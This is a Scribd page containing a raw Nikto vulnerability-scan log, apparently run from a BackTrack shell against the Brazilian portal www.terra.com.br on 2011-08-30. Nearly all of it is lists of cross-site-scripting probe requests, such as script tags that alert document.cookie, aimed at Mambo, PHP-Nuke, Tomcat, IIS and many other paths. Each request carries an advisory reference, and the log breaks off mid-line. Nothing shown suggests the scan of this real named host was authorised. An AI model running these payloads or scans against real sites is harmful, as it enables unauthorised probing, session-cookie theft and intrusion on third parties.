Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Terra

    Enviado por

    jamsux
    236 visualizações9 páginas
    Terra.com.br - nikto v2.03 / 2.04 - 'no web server found on 200.154.56.80:Host: 200.154.56' - contains 10 'disallow' entries which should be manually viewed. + OSVDB-0: GET / themes / mambosimple.php?detected&sitename= alert(document.cookie); : Mambo PHP Portal / server is

    Descrição original:

    Título original

    terra

    Direitos autorais

    © Attribution Non-Commercial (BY-NC)

    Formatos disponíveis

    TXT, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento
    Terra.com.br - nikto v2.03 / 2.04 - 'no web server found on 200.154.56.80:Host: 200.154.56' - contains 10 'disallow' entries which should be manually viewed. + OSVDB-0: GET / themes / mambosimple.php?detected&sitename= alert(document.cookie); : Mambo PHP Portal / server is

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    236 visualizações9 páginas

    Terra

    Enviado por

    jamsux
    Terra.com.br - nikto v2.03 / 2.04 - 'no web server found on 200.154.56.80:Host: 200.154.56' - contains 10 'disallow' entries which should be manually viewed. + OSVDB-0: GET / themes / mambosimple.php?detected&sitename= alert(document.cookie); : Mambo PHP Portal / server is

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato TXT, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 9

    root@bt:~# nikto -h www.terra.com.br - Nikto v2.03/2.04 --------------------------------------------------------------------------+ No web server found on 200.154.56.80:Host: 200.154.56.80 (www.terra.com.

    br) Status: Up --------------------------------------------------------------------------+ Target IP: 200.154.56.80 + Target Hostname: www.terra.com.br + Target Port: 80 + Start Time: 2011-08-30 11:18:11 --------------------------------------------------------------------------+ Server: No banner retrieved - Root page / redirects to: /portal/ - /robots.txt - contains 10 'disallow' entries which should be manually viewed. (GET) + OSVDB-0: GET /themes/mambosimple.php?detection=detected&sitename=</title><scri pt>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cr oss Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /index.php?option=search&searchword=<script>alert(document.cookie );</script> : Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripti ng (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</s cript> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). ht tp://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</sc ript> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). htt p://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /emailfriend/emailarticle.php?id=\"<script>alert(document.cookie) </script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /administrator/upload.php?newbanner=1&choice=\"<script>alert(docu ment.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scri pting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&link=\"<script> alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /administrator/gallery/view.php?path=\"<script>alert(document.coo kie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (X SS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=\"<script>alert( document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /administrator/gallery/navigation.php?directory=\"<script>alert(d ocument.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site S cripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /administrator/gallery/gallery.php?directory=\"<script>alert(docu ment.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scri pting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /index.php?dir=<script>alert('Vulnerable')</script> : Auto Direct ory Index 1.2.3 and prior are vulnerable to XSS attacks. + OSVDB-0: GET /https-admserv/bin/index?/<script>alert(document.cookie)</script> : Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks. + OSVDB-0: GET /clusterframe.jsp?cluster=<script>alert(document.cookie)</script> : Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a X SS attack. + OSVDB-0: GET /upload.php?type=\"<script>alert(document.cookie)</script> : Mamb o PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert .org/advisories/CA-2000-02.html. + OSVDB-4619: GET /soinfo.php?\"><script>alert('Vulnerable')</script> : The PHP script soinfo.php is vulnerable to Cross Site Scripting Set expose_php = Off in

    php.ini. + OSVDB-0: GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp : Apache T omcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). http://www.cert.o rg/advisories/CA-2000-02.html. + OSVDB-0: GET /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</scr ipt> : NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). h ttp://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vuln erable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')< /script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')< /script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert( 'Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XS S) by invoking java classes. http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable') </script> : The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro %20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebL ogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>a lert(document.cookie)</script> : IIS 6 on Windows 2003 is vulnerable to Cross Si te Scripting (XSS) in certain error messages. http://www.cert.org/advisories/CA2000-02.html. + OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulne rable')</script> : Site Server is vulnerable to Cross Site Scripting + OSVDB-17666: GET /_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</scri pt> : Site Server is vulnerable to Cross Site Scripting + OSVDB-0: GET /nosuchurl/><script>alert('Vulnerable')</script> : JEUS is vulner able to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http: //securitytracker.com/alerts/2003/Jun/1007004.html + OSVDB-0: GET /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</s cript> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XS S). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /cgi/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert(' Vulnerable')</script> : YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vul nerable')</script>; : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http:/ /www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</sc ript> : ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/ advisories/CA-2000-02.html. + OSVDB-0: GET /cgi/FormMail.cgi?<script>alert(\"Vulnerable\");</script> : FormM ail.cgi allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-200 0-02.html. + OSVDB-0: GET /cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1& keywords=vulnerable : Faq-O-Matic is vulnerable to cross site scripting (XSS) ht tp://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqo matic.sourceforge.net/fom-serve/cache/1.html + OSVDB-0: GET /cgi/fom.cgi?file=<script>alert('Vulnerable')</script> : Faq-O-Ma tic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from htt p://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-0 2.html.

    + OSVDB-0: GET /cgi/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable' )</script> : Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripti ng (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsof t .net). http://www.cert.org/advisories/CA-2000-02.html + OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx : Cross site scripti ng (XSS) is allowed with .aspx file requests (may be Microsoft .net). http://www .cert.org/advisories/CA-2000-02.html + OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.asp : Cross site scriptin g (XSS) is allowed with .asp file requests (may be Microsoft .net). http://www.c ert.org/advisories/CA-2000-02.html + OSVDB-0: GET /catinfo?<u><b>TESTING : The Interscan Viruswall catinfo script i s vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-20 00-02.html. + OSVDB-0: GET /user.php?op=userinfo&uname=<script>alert('hi');</script> : The P hpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versi ons above 5.3.1. http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg% 20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com : Post Nuk e 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.o rg/advisories/CA-2000-02.html. + OSVDB-0: GET /templates/form_header.php?noticemsg=<script>javascript:alert(doc ument.cookie)</script> : MyMarket 1.71 is vulnerable to Cross Site Scripting (XS S). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>a lert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.s ourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Script ing (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert( 'Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.source forge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting ( XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert ('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourc eforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /sunshop.index.php?action=storenew&username=<script>alert('Vulner able')</script> : SunShop is vulnerable to Cross Site Scripting (XSS) in the sig nup page. CA-200-02. + OSVDB-0: GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<s cript>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script> &op=Preview : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS ). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> : Actin ic E-Commerce services is vulnerable to Cross Site Scripting (XSS). http://www.c ert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&u ser=P : CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). http ://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: POST /servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script > : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). http://www.c ert.org/advisories/CA-2000-02.html. + OSVDB-0: POST /servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")< /script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). http: //www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</scri pt> : Open Market Inc.ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /search/index.cfm?<script>alert(\"Vulnerable\")</script> : Search

    agent allows Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000 -02.html. + OSVDB-0: GET /search.php?zoom_query=<script>alert(\"hello\")</script> : Wrenso ft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). http://www.ce rt.org/advisories/CA-2000-02.html. + OSVDB-0: GET /search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade t o the latest version. http://www.securityfocus.com/bid/8288. + OSVDB-0: GET /search.php?searchfor=\"><script>alert('Vulnerable');</script> : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org /advisories/CA-2000-02.html. + OSVDB-0: GET /search.asp?term=<%00script>alert('Vulnerable')</script> : ASP.Ne t 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers wi ll render this). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /samples/search.dll?query=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). htt p://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable') </script>%3Ca%20s=%22&code=1 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_li mit=10\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are v ulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-200002.html. + OSVDB-0: GET /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PA GE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.or g/advisories/CA-2000-02.html. + OSVDB-0: GET /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fat cat_id=1%00+\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA -2000-02.html. + OSVDB-0: GET /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2& year=2003&day=1+%00\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x an d below are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/adviso ries/CA-2000-02.html. + OSVDB-0: GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> : PHP Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). http://www.ce rt.org/advisories/CA-2000-02.html. + OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS). + OSVDB-32774: GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scriptin g (XSS). + OSVDB-0: GET /phpimageview.php?pic=javascript:alert('Vulnerable') : PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advis ories/CA-2000-02.html. + OSVDB-0: GET /phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script > : phpBB is vulnerable to Cross Site Scripting (XSS), upgrade to the latest ver sion. http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:al ert(document.cookie)</script> : phpBB is vulnerable to Cross Site Scripting (XSS ). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerab le')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross S ite Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.

    + OSVDB-0: GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerab le')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross S ite Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> : Vignette server is vulnerable to Cross Site Scripting (XSS). http://www.cert.or g/advisories/CA-2000-02.html. Upgrade to the latest version. + OSVDB-0: GET /node/view/666\"><script>alert(document.domain)</script> : Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advis ories/CA-2000-02.html. + OSVDB-0: GET /netutils/whodata.stm?sitename=<script>alert(document.cookie)</sc ript> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS) . http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> : RaQ3 server script is vulnerable to Cross Site Scripting (XSS). http://www.c ert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[ /script]?query= : myphpnuke is vulnerable to Cross Site Scripting (XSS). http:// www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(documen t.cookie);[/script]&ratetype=percent : myphpnuke is vulnerable to Cross Site Scr ipting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</scri pt> : OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). http://www.c ert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /msadm/user/login.php3?account_name=\"><script>alert('Vulnerable' )</script> : The Sendmail Server Site User login is vulnerable to Cross Site Scr ipting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</scr ipt> : The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /msadm/domain/index.php3?account_name=\"><script>alert('Vulnerabl e')</script> : The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules/Submit/index.php?op=pre&title=<script>alert(document.coo kie);</script> : Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). http ://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--></style><script>aler t('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (X SS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</ script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http://www.c ert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulne rable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). htt p://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnera ble')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). http: //www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&me mber=<script>alert('Vulnerable')</script> : The XForum (PHPNuke Add-on module) i s vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-20 00-02.html. + OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerabl e')</script>&fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to Cross S ite Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>ale rt('Vulnerable')</script> : Wiki PostNuke Module is vulnerable to Cross Site Scr ipting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&c id=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cro

    ss Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>al ert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scrip ting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?op=modload&name=Members_List&file=index&letter=<scri pt>alert('Vulnerable')</script> : This install of PHPNuke's modules.php is vulne rable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.h tml. + OSVDB-0: GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>a lert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scri pting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&ca tegories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0 : Post N uke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert .org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script >alert('Vulnerable')</script> : The DMOZGateway (PHPNuke Add-on module) is vulne rable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.h tml. + OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>al ert(document.cookie)</script> : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/R C3, 6.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisor ies/CA-2000-02.html. + OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('V ulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting ( XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</scr ipt> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www .cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>aler t('Vulnerable')</script>&month=3&month_l=test : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=0 3&month_l=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitl e=<script>alert('Vulnerable')</script> : This install of PHPNuke is vulnerable t o Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<s cript>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Si te Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document. cookie);%3E&op=modload&name=Members_List&file=index : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2 000-02.html. + OSVDB-0: GET /members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS) . http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</script> : Megabook guestbook is vulnerable to Cross Site Scripting (XSS). http://www.cert. org/advisories/CA-2000-02.html. + OSVDB-0: GET /mailman/listinfo/<script>alert('Vulnerable')</script> : Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. ht tp://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</sc ript> : IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS atta ck. + OSVDB-0: GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script > : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError functi on. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.htm

    l. + OSVDB-0: GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script > : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError functi on. Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.htm l. + OSVDB-0: GET /isapi/testisa.dll?check1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). htt p://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> : Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert. org/advisories/CA-2000-02.html. + OSVDB-0: GET /index.php?action=storenew&username=<script>alert('Vulnerable')</ script> : SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page . CA-200-02. + OSVDB-0: GET /index.php/\"><script><script>alert(document.cookie)</script>< : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/ad visories/CA-2000-02.html. + OSVDB-0: GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(d ocument.cookie)</script> : eZ publish v3 and prior allow Cross Site Scripting (X SS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /index.php/content/advancedsearch/?SearchText=<script>alert(docum ent.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&Se archContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advis ories/CA-2000-02.html. + OSVDB-0: GET /html/partner.php?mainfile=anything&Default_Theme='<script>alert( document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cr oss Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /html/chatheader.php?mainfile=anything&Default_Theme='<script>ale rt(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advis ories/CA-2000-02.html. + OSVDB-0: GET /gallery/search.php?searchstring=<script>alert(document.cookie)</ script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). U pgrade to the latest version. http://www.securityfocus.com/bid/8288. + OSVDB-0: GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script > : This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02. html. + OSVDB-0: GET /forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v %20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripti ng (XSS). http://www.cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength =120&passwrd=PASSWORD<script>alert('Vulnerable')</script> : YaBB is vulnerable t o Cross Site Scripting (XSS) in the password field of the login page. http://www .cert.org/advisories/CA-2000-02.html. + OSVDB-0: GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; : M acromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Sc ripting (XSS) in the error pages. http://www.cert.org/advisories/CA-2000-02.html . + OSVDB-0: GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</scri pt> : This version of PHP-Nuke's download.php is vulnerable to Cross Site Script ing (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000 -02.html. + OSVDB-0: GET /comments.php?subject=<script>alert('Vulnerable')</script>&commen t=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview : This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02

